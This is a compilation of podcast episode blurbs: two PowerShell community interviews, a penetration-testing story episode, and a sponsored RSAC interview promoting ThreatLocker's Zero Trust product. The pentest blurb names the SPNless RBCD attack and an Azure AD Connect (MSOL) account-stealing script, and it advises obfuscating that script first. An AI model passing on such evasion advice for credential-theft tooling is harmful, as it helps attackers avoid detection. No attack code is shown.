In this episode of the PowerShell Podcast, we sit down with Brock Bingham, a longtime PowerShell enthusiast, educator, and community advocate. Recorded live from PDQ Headquarters in Salt Lake City, Utah, this episode captures the high energy and camaraderie of a PowerShell Wednesday in person. Brock shares his journey from PowerShell beginner to mentor, his passion for community building, and the power of sharing knowledge with others. Key topics in this episode include: Overcoming Stage Fright and Imposter Syndrome – How PowerShell Wednesday and live presentations have helped Brock gain confidence. The Power of Documentation and Knowledge Sharing – Why good documentation and teaching others are critical for long-term growth. Community Connection and Growth – How engaging with the PowerShell community can transform your career and personal development. Exploring PowerShell Tools and Projects – From using Pester for testing to building cool GUIs with MDGRS, Brock dives into the creative side of PowerShell. Learning from Failure and Embracing Red Text – Why mistakes are a critical part of the learning journey. Finding Your Voice in the PowerShell World – Brock's advice for building confidence, sharing your work, and making an impact. From caffeine-fueled coding sessions to discovering the power of collaboration, this episode is a heartfelt conversation about growth, mentorship, and building a career around PowerShell. Join the conversation: Connect with Brock Bingham on LinkedIn: https://www.linkedin.com/in/jonathanbrockbingham/ Connect with Brock on BlueSky: https://bsky.app/profile/brockbingham.bsky.social Connect with Andrew: https://andrewpla.tech/links Join PowerShell Wednesdays every Wednesday at 2 PM EST on discord.gg/pdq The PowerShell Podcast: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: The PowerShell Podcast: https://pdq.com/the-powershell-podcast
In this episode of the PowerShell Podcast, we bring you a special double feature! We chat with Bogdan Calapod live from PDQ HQ, a seasoned security expert and co-founder of Coda, who reflects on his path from hackathon projects to helping organizations secure their environments. Then, we sit down with Lucas Allman live from the PowerShell + DevOps Global Summit, where he shares his journey from podcast listener to conference presenter. Key topics in this episode include: Finding Your Place in the PowerShell Community – How Lucas went from listening to the PowerShell Podcast to presenting at Summit. Overcoming Stage Fright and Imposter Syndrome – Lucas's experience giving his first lightning demo to a room full of PowerShell pros. The Power of Personal Growth and Knowledge Sharing – Building confidence, contributing to internal user groups, and advocating for automation. Building Security from the Ground Up – Bogdan's journey from hackathon developer to security co-founder, including the creation of Coda. Simplifying Security for the Real World – Lessons learned from building tools to automate vulnerability detection and remediation. Staying Curious and Always Learning – Why continuous education, knowledge sharing, and community engagement are essential for long-term success. This episode captures the spirit of learning, teaching, and growth that defines the PowerShell community. Whether you're a newcomer or a seasoned pro, this double feature has insights for everyone. Links: Connect with Lucas Allman on LinkedIn: https://www.linkedin.com/in/lucas-allman-407a1055/ Follow Bogdan on GitHub: https://github.com/bogdan-calapod Follow Andrew: https://andrewpla.tech/links Join PowerShell Wednesdays every Wednesday at 2 PM EST on discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/Jhxr2GB9-Mg
Today's tale of pentest pwnage is another great one! We talk about: The SPNless RBCD attack (covered in more detail in this episode) Importance of looking at all “branches” of outbound permissions that your user has in BloodHound This devilishly effective MSOL-account-stealing PowerShell script (obfuscate it first!) A personal update on my frustration with ringing in my ears
In this on-location episode recorded at the RSAC Conference, Sean Martin and Marco Ciappelli sit down once again with Rob Allen, Chief Product Officer at ThreatLocker, to unpack what Zero Trust really looks like in practice—and how organizations can actually get started without feeling buried by complexity.Rather than focusing on theory or buzzwords, Rob lays out a clear path that begins with visibility. “You can't control what you can't see,” he explains. The first step toward Zero Trust is deploying lightweight agents that automatically build a view of the software running across your environment. From there, policies can be crafted to default-deny unknown applications, while still enabling legitimate business needs through controlled exceptions.The Zero Trust Mindset: Assume Breach, Limit AccessRob echoes the federal mandate definition of Zero Trust: assume a breach has already occurred and limit access to only what is needed. This assumption flips the defensive posture from reactive to proactive. It's not about waiting to detect bad behavior—it's about blocking the behavior before it starts.The ThreatLocker approach stands out because it focuses on removing the traditional “heavy lift” often associated with Zero Trust implementations. Rob highlights how some organizations have spent years trying (and failing) to activate overly complex systems, only to end up stuck with unused tools and endless false positives. ThreatLocker's automation is designed to lower that barrier and get organizations to meaningful control faster.Modern Threats, Simplified DefensesAs AI accelerates the creation of polymorphic malware and low-code attack scripts, Zero Trust offers a counterweight. Deny-by-default policies don't require knowing every new threat—just clear guardrails that prevent unauthorized activity, no matter how it's created. Whether it's PowerShell scripts exfiltrating data or AI-generated exploits, proactive controls make it harder for attackers to operate undetected.This episode reframes Zero Trust from an overwhelming project into a series of achievable, common-sense steps. If you're ready to hear what it takes to stop chasing false positives and start building a safer, more controlled environment, this conversation is for you.Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974Note: This story contains promotional content. Learn more.Guest: Rob Allen, Chief Product Officer, ThreatLocker | https://www.linkedin.com/in/threatlockerrob/ResourcesLearn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlockerLearn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsac25______________________Keywords:sean martin, marco ciappelli, rob allen, zero trust, cybersecurity, visibility, access control, proactive defense, ai threats, policy automation, brand story, brand marketing, marketing podcast, brand story podcast______________________Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverageWant to tell your Brand Story Briefing as part of our event coverage? Learn More